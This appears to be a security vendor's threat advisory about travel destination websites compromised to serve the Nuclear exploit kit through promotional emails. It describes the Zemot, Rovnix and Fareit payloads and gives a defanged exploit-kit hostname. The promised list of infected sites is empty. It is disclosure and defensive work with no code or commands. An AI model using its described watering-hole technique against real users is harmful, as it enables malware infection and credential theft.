Proofpoint security researchers recently were the first to discover that a large number of travel destination websites had been compromised and were being used to deliver the Nuclear exploit kit.
The infected sites were detected by Proofpoint’s Targeted Attack Protection after users received promotional emails from these sites containing links to infected pages. This is likely a highly effective campaign, and shares many of the attributes usually associated with watering hole attacks, since these were legitimate emails that users had typically opted-in to receive.
Some of the promotional emails included references to 4th of July activities while others were general travel related content, so the attackers timed their activities to coincide with the summer travel season and the marketing activities that usually happen this time of year.
Initially about a dozen travel destination websites were identified as being compromised, but additional sites are still continuing to be discovered. What’s particularly worrisome is that these are popular sites that see a lot of organic web traffic, so anyone searching for information relating to tourism in a large number of US cities could have been exposed to the infected sites.
For example, the Myrtle Beach website (www[.]visitmyrtlebeach[.]com) is the #2 search result on Google for “myrtle beach” and has an Alexa ranking of 79,296.
When a user browsed to any of these websites they were exposed to the Nuclear exploit kit that integrates multiple different exploits including exploits for Java and Adobe Acrobat. In this case, if the exploit is successful, it attempts to install at least three pieces of malware:
Zemot – A downloader that downloads and installs additional pieces of malware.
Rovnix – A sophisticated bootloader/rootkit that launches the installed malware when the PC boots and then hides itself and other malware from detection.
Fareit – Also a downloader that also attempts to steal user credentials and can be used in DDOS attacks.
This attack was also clever about its choice of hostname for the site hosting the exploit kit. In this case they used what appears to be a travel related site, ecom[.]virtualtravelevent[.]org, helping make the exploit link blend in and look like legitimate content.
So far, all the IPs used in the attack appear to be based in the Ukraine.
Current list of infected websites:
The hosting companies for these sites have been contacted, so some sites shown above might have been fixed.